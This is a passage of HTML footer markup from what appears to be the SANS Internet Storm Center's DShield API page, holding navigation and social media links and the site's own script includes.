<li><a href="/about.html">About Us</a></li> <li><a href="/handler_list.html">Handlers</a></li> <li><a href="/privacy.html">Privacy Policy</a></li> </ul> </div> <div class="footer-social"> <ul id="socialIconsFoot"> <li><a rel="noopener" href="https://www.youtube.com/channel/UCfbOsqPmWg1H_34hTjKEW2A"><span class="youtube"></span></a></li> <li class="twitter"><a rel="noopener" href="https://twitter.com/sans_isc"><span class="twitter"></span></a></li> <li class="linkedin"><a rel="noopener" href="https://www.linkedin.com/groups?gid=35470"><span class="linkedin"></span></a></li> <li class="mastodon"><a rel="noopener" href="https://infosec.exchange/@sans_isc"><span class="mastodon"></span></a></li> <li class="rss"><a href="/xml.html"><span class="rss"></span></a></li> </ul> </div> </div> </div> <script type="text/javascript" src="/js/main.js"></script> <script language="JavaScript" type="text/javascript" src="/js/menu.js"></script> </div> <script type="text/javascript" src="/_Incapsula_Resource?SWJIYLWA=719d34d31c8e3a6e6fffd425f7e032f3&ns=2&cb=1048254459" async></script></body></html>

CINXE.COM

DShield API - SANS Internet Storm Center